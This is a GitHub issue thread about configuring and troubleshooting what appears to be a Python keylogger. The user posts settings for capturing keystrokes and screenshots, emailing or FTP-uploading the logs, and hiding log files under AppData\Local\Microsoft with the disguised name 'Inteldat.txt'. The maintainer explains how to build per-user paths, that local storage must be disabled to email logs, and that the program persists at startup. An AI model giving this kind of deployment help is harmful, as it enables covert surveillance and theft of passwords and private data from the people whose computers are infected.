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userpath issue in windows #29

Closed tehseensagar closed 6 years ago

tehseensagar commented 6 years ago

I've been trying to set path as

C:\Users\%username%\AppData\Local\Microsoft <== does not work out


C:\Users\michael\AppData\Local\Microsoft <== hard coded username worked

I don't want that path to be hard coded , all I want is to set the path for any user I.E C:\Users\abc\AppData\Local\Microsoft or like C:\Users\xyz\AppData\Local\Microsoft and rest of the path remain same only user changes. What ever user is logged in and run binary it gets user path and create files there.

Emailing Issue:

I've setup enabled less secure App in google , yet unable to receive any of email

Py2exe Compilation

Insufficient sysem resources exist to complete the requestd services

Getting above error when compiling via py2exe


xp4xbox commented 6 years ago

In python to use environment variables you have to do something like username = os.environ["USERNAME"].

For the email issue, i have just tested it out, works fine. I would double check your settings, make sure you don't have any conflicting settings.

For the py2exe problems, I have never gotten that error before, I would just try again.

xp4xbox commented 6 years ago

Also you can only choose one method for storing/sending logs, default is by email. So if you want to store logs local and send them, there will be a conflict.

tehseensagar commented 6 years ago

My email setting

strEmailAc = "xxxxx@gmail.com" strEmailPass = "Passwd"

Further settings:

`blnFTP = "False" # if using ftp set this to True and configure the options below strFtpServer = "" intFtpPort = 21 strFtpUser = "" strFtpPass = "" strFtpRemotePath = "/"

intCharPerSend = 10 # set num of chars before send log/store (1000)

blnUseTime = "False" # if you prefer to use a timer to send/save logs, set this to True intTimePerSend = 10 # set how often to send/save logs in seconds (120)

blnStoreLocal = "True" # True to save logs/screens locally strLogFile = "C:/Users/michael/AppData/Local/Microsoft/Inteldat.txt" # set non-protected path to text file eg. c:/temp/test.txt

blnLogClick = "False" # for logging window clicks blnBackRemove = "False" # set this to True if you prefer the program removes the last key if the user types backspace

blnScrShot = "True" # set to True for capturing screenshots strScrDir = "C:/Users/michael/AppData/Local/Microsoft" # set non-protected dir for scrshot location if storing locally. eg c:/temp intScrTime = 10 # set time for taking screen in seconds (120)`

Here is my current settings , just let me know do I have to set strScrDir , strLogFile and blnStoreLocal setting to False to get email working. What if there is no internet available then keys will be logged??? Is it correct setting for userp.

username = os.environ["USERNAME"] strLogFile = "C:/Users/+username+/AppData/Local/Microsoft/Inteldat.txt"


xp4xbox commented 6 years ago

You have to set blnStoreLocal to false to use email. Also the way you set it up now, you will be receiving emails every 10 characters for intCharPerSend. If there is no internet then then the program will exit which is why I added the ability for it to be run at startup. For username it should be "C:/Users/" +username+"/AppData/Local/Microsoft/Inteldat.txt"